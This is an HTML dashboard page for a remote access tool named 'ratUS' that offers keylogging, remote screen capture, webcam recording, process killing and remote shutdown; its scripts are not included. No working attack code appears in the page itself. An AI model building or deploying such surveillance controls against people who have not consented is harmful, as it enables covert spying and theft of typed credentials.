<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>RATUS | Dashboard</title>
    <link rel="stylesheet" href="css/style.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" rel="stylesheet">
</head>
<body>

    <nav class="navbar">
        <div style="display: flex; align-items: center; gap: 15px;">
            <a href="index.html" class="brand">
                <i class="fa-solid fa-terminal" style="margin-right: 8px;"></i> ratUS
            </a>
            <div style="height: 20px; width: 1px; background: rgba(255,255,255,0.2);"></div>
            <span style="color: var(--text-muted); font-size: 0.9rem; letter-spacing: 1px;">COMMAND CENTER</span>
        </div>
        
        <div style="display: flex; align-items: center; gap: 20px;">
            <div class="status disconnected" id="status" 
                 style="font-family: 'JetBrains Mono'; font-size: 0.8rem; padding: 5px 12px; border-radius: 4px; border: 1px solid rgba(255,255,255,0.1);">
                Disconnected
            </div>
            
            <a href="index.html" class="btn btn-ghost" style="padding: 8px 16px; font-size: 0.85rem; border-radius: 8px;">
                <i class="fa-solid fa-right-from-bracket"></i> Exit
            </a>
        </div>
    </nav>

    <main class="master-detail-layout">

        <aside class="sidebar">
            <h2 style="color: var(--text-muted); font-size: 0.75rem; margin-bottom: 15px; text-transform: uppercase; letter-spacing: 1px;">Modules</h2>
            
            <button class="menu-btn active" onclick="switchTab('app')">
                <i class="fa-solid fa-cube"></i> Applications
            </button>

            <button class="menu-btn" onclick="switchTab('process')">
                <i class="fa-solid fa-microchip"></i> Processes
            </button>

            <button class="menu-btn" onclick="switchTab('keylogger')">
                <i class="fa-solid fa-keyboard"></i> Keylogger
            </button>

            <button class="menu-btn" onclick="switchTab('screenshot')">
                <i class="fa-solid fa-desktop"></i> Live Screen
            </button>

            <button class="menu-btn" onclick="switchTab('webcam')">
                <i class="fa-solid fa-video"></i> Webcam
            </button>

            <div style="margin-top: 20px; border-top: 1px solid rgba(255,255,255,0.1); padding-top: 15px;">
                <button class="menu-btn" style="color: #f43f5e;" onclick="switchTab('system')">
                    <i class="fa-solid fa-power-off"></i> System Power
                </button>
            </div>
        </aside>

        <section class="content-area">

            <div id="app" class="content-view active">
                <h2 style="margin-bottom: 20px;">Application Manager</h2>
                <div class="app-control-grid">
                    <div class="control-box">
                        <h3 style="color: var(--primary); margin-bottom: 15px; font-size: 0.9rem;">Operations</h3>
                        
                        <button class="btn btn-primary full-width" onclick="listApp()">
                            <i class="fa-solid fa-rotate"></i> Fetch Applications List
                        </button>
                        
                        <hr style="border: 0; border-top: 1px solid rgba(255,255,255,0.1); margin: 20px 0;">

                        <label style="font-size: 0.8rem; color: var(--text-muted); display: block; margin-bottom: 5px;">Start Application</label>
                        <div style="display: flex; gap: 10px; margin-bottom: 20px;">
                            <input id="startAppInput" type="text" placeholder="e.g: notepad.exe">
                            <button class="btn btn-primary" style="padding: 10px 20px; border-radius: 8px;" onclick="startApp()">Start</button>
                        </div>

                        <label style="font-size: 0.8rem; color: var(--text-muted); display: block; margin-bottom: 5px;">Kill Application</label>
                        <button class="btn" style="background: #ef4444; color: white; width: 100%; border-radius: 8px;" onclick="stopApp()">
                            <i class="fas fa-skull"></i> Kill Process (PID)
                        </button>
                    </div>

                    <div class="control-box">
                        <h3 style="color: var(--text-muted); margin-bottom: 15px; font-size: 0.9rem;">Output Stream</h3>
                        <pre id="appList" class="log-box" style="height: 200px; margin-bottom: 15px;"></pre>
                        <pre id="appLog" class="log-box" style="height: 150px; color: #94a3b8; border-color: #334155;"></pre>
                    </div>
                </div>
            </div>

            <div id="process" class="content-view">
                <h2 style="margin-bottom: 20px;">Process Manager</h2>
                <div class="app-control-grid">
                    <div class="control-box">
                        <h3 style="color: var(--primary); margin-bottom: 15px;">Actions</h3>
                        <button class="btn btn-primary full-width" onclick="listProc()">Fetch Processes List</button>
                        <hr style="margin: 20px 0; border-color: rgba(255,255,255,0.1);">
                        <button class="btn" style="background: #ef4444; color: white; width: 100%; border-radius: 8px;" onclick="stopProc()">
                            <i class="fas fa-skull"></i> Kill Process ID
                        </button>
                    </div>
                    <div class="control-box">
                        <h3 style="color: var(--text-muted); margin-bottom: 15px;">Process List</h3>
                        <pre id="procList" class="log-box" style="height: 400px;"></pre>
                    </div>
                </div>
            </div>

            <div id="keylogger" class="content-view">
                <h2 style="margin-bottom: 20px;">Keylogger</h2>
                <div class="app-control-grid">
                    <div class="control-box">
                        <button class="btn btn-primary full-width" style="background: #22c55e; color: #000;" onclick="startKeylogger()">▶ Start Capture</button>
                        <button class="btn btn-primary full-width" style="background: #ef4444; margin-top: 10px;" onclick="stopKeylogger()">⏹ Stop Capture</button>
                        <button class="btn btn-ghost full-width" style="margin-top: 10px;" onclick="getKeylog()">📥 Dump Data</button>
                    </div>
                    <div class="control-box">
                        <h3 style="color: var(--text-muted); margin-bottom: 10px;">Keystrokes</h3>
                        <div id="keylog_output" class="log-box" style="height: 400px;"></div>
                    </div>
                </div>
            </div>

            <div id="screenshot" class="content-view">
                <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px;">
                    <h2>Remote Screen</h2>
                    <button class="btn btn-primary" onclick="Screenshoot()">Capture Now</button>
                </div>
                <div style="background: #000; border: 1px solid #333; height: 500px; display: flex; align-items: center; justify-content: center; border-radius: 12px;">
                    <img id="screenshotImg" style="max-width:100%; max-height:100%; display:none;">
                    <span style="color: #444;">No Signal</span>
                </div>
            </div>

            <div id="webcam" class="content-view">
                <h2 style="margin-bottom: 20px;">Webcam Stream</h2>
                <div class="control-box" style="text-align: center;">
                    <div style="background: #000; margin-bottom: 20px; border-radius: 8px; overflow: hidden;">
                        <video controls width="100%">
                            <source src="http://127.0.0.1:8080/video/test.mp4" type="video/mp4">
                            Browser not supported
                        </video>
                    </div>
                    <button class="btn btn-primary" onclick="startWebcam()">Start Rec</button>
                    <button id="downloadBtn" class="btn btn-ghost" onclick="downloadVideo()" disabled>Download</button>
                </div>
            </div>

            <div id="system" class="content-view">
                <h2 style="margin-bottom: 20px;">System Control</h2>
                <div class="grid-cards">
                    <div class="card" style="text-align: center; border-color: #22c55e; box-shadow: 0 0 15px rgba(34, 197, 94, 0.15);">
                        <i class="fa-solid fa-rotate-right" style="font-size: 2rem; color: #22c55e; margin-bottom: 15px;"></i>
                        <h3 style="color: #22c55e;">Restart</h3>
                        <button class="btn full-width" 
                            style="background: #22c55e; color: #000; font-weight: 800; margin-top: 15px; border: none; box-shadow: 0 4px 12px rgba(34, 197, 94, 0.3);" 
                            onclick="restart()">
                            <i class="fa-solid fa-bolt"></i> Execute
                        </button>
                    </div>

                    <div class="card" style="text-align: center; border-color: #f43f5e; box-shadow: 0 0 15px rgba(244, 63, 94, 0.15);">
                        <i class="fa-solid fa-power-off" style="font-size: 2rem; color: #f43f5e; margin-bottom: 15px;"></i>
                        <h3 style="color: #f43f5e;">Shutdown</h3>
                        <button class="btn full-width" 
                            style="background: #f43f5e; color: white; font-weight: 600; margin-top: 15px; border: none; box-shadow: 0 4px 12px rgba(244, 63, 94, 0.3);" 
                            onclick="shutdown()">
                        <i class="fa-solid fa-ban"></i> Execute
                        </button>
                    </div>
                </div>
            </div>

        </section>
    </main>

    <script src="js/websocket.js"></script>
    <script src="js/ui.js"></script>
    <script src="js/command.js"></script>
    <script src="js/transition.js"></script>
</body>
</html>